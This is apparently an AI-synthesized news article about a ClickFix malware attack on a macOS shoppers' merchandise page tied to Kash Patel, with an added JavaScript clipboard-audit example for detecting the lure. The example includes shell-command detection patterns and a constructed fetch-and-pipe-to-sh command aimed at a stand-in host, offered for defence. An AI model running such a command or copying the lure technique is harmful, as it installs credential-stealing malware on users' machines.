VYPR
Breach · Published May 23, 2026 · 1 source

ClickFix Malware on FBI Director Kash Patel's Former Apparel Site Targets macOS Users

A ClickFix malware campaign on the merchandise page of Based Apparel, a store co-founded by FBI Director Kash Patel, targeted macOS shoppers with a fake Cloudflare verification to deploy an infostealer.

A malware campaign targeting macOS users struck the merchandise page of the Patel Foundation, co-founded by FBI Director Kash Patel, on Thursday. The Based Apparel site served a ClickFix attack that attempted to trick shoppers into running a malicious command disguised as a Cloudflare verification step. The entire merchandise shop was taken offline Friday after the incident was publicly disclosed.

The attack specifically targeted visitors to basedapparel.com/product-category/the-kash-foundation/, where a fake Cloudflare turnstile page prompted users to copy a string reading "I am not a robot: Cloudflare Verification ID: 801470" into their command line. When users clicked the copy button, an obfuscated hidden command was actually copied to the clipboard. Executing that command would pull down an infostealer designed to exfiltrate data from cryptocurrency wallets, session tokens, Keychain data, and credentials stored in browsers.
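The defining signal described above is that the text shown to the user differs from the text the copy button places on the clipboard. The following added example (not code from the campaign, the site, or any vendor named in this article) shows how a browser extension or endpoint clipboard hook could score that mismatch; the function names, the indicator list, and the sample command are assumptions constructed for illustration.

```javascript
// Indicators that clipboard text is meant for a terminal.
// Assumed list for this example, not exhaustive.
const SHELL_INDICATORS = [
  { name: "download-tool", re: /\b(?:curl|wget)\b/i },
  { name: "pipe-to-interpreter", re: /\|\s*(?:(?:ba|z)?sh|osascript|python3?)\b/i },
  { name: "base64-decode", re: /\bbase64\s+(?:-d|-D|--decode)\b/ },
  { name: "command-substitution", re: /\$\(|`/ },
];

// Collapse whitespace so cosmetic differences are not reported as a mismatch.
function normalise(text) {
  return String(text).replace(/\s+/g, " ").trim();
}

// Compare what the page displayed with what it wrote to the clipboard.
// Hypothetical helper: a real hook would call this from a "copy" event
// listener or a wrapper around the page's clipboard write.
function auditClipboardWrite(displayedText, clipboardText) {
  const shown = normalise(displayedText);
  const copied = normalise(clipboardText);
  const mismatch = shown !== copied;
  const indicators = SHELL_INDICATORS
    .filter((i) => i.re.test(copied))
    .map((i) => i.name);

  // Hidden text that also looks like a shell command is the ClickFix pattern.
  let verdict = "allow";
  if (mismatch && indicators.length > 0) verdict = "block";
  else if (mismatch || indicators.length > 0) verdict = "warn";
  return { verdict, mismatch, indicators };
}

// Lure text as quoted in the article, and a constructed stand-in command
// (the real payload is not reproduced on this page).
const LURE = "I am not a robot: Cloudflare Verification ID: 801470";
const CONSTRUCTED_COMMAND = "curl -fsSL https://example.invalid/verify | sh";

console.log(auditClipboardWrite(LURE, CONSTRUCTED_COMMAND));
```

A legitimate documentation page that displays an install command and copies exactly that command produces only a `warn`, since the user can see what they are about to paste.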

The ClickFix social engineering technique has been growing in popularity, with Microsoft Threat Intelligence noting in an analysis that campaigns using this method target "thousands of enterprise and end-user devices globally every day." The technique exploits user trust in common web verification processes to trick victims into running arbitrary commands that download malware.

A Twitter user named "debbie" first identified the malware and retrieved the malicious shell script payload. She told PCMag that the payload was flagged as malicious by 27 security vendors on VirusTotal, indicating broad detection across the antivirus industry. The incident follows a prior breach of Patel's personal email by Iran-linked hackers in March, when a group widely believed to be a front for Iranian intelligence broke into a Gmail account the FBI director once used.

Based Apparel was co-founded by Patel and Andrew Ollis, a direct marketing entrepreneur with many business ties to Patel. Although Patel resigned from the clothing store before February 2025, his name and graphics from his personal foundation are printed on shirts and hoodies sold at the shop. The FBI issued a statement clarifying that "Based Apparel is no longer Director Patel's website. Patel divested from any interest in it prior to being confirmed as FBI Director and does not profit from it." Based Apparel did not respond to a request for comment.

The incident highlights the ongoing risk of supply-chain and brand-adjacent attacks targeting high-profile individuals and their associated businesses. Even after divestment, the association with a current FBI director made the site an attractive target for threat actors seeking to compromise visitors' devices. The use of macOS-specific targeting also underscores the growing attention attackers are paying to Apple's user base, which has historically been perceived as less vulnerable to malware.

Security experts recommend that users remain cautious when encountering unexpected verification prompts on e-commerce sites, particularly those that ask them to run commands in a terminal. Organizations should also consider implementing web application firewalls and content security policies to detect and block such social engineering attacks at the network level.

Synthesized by Vypr AI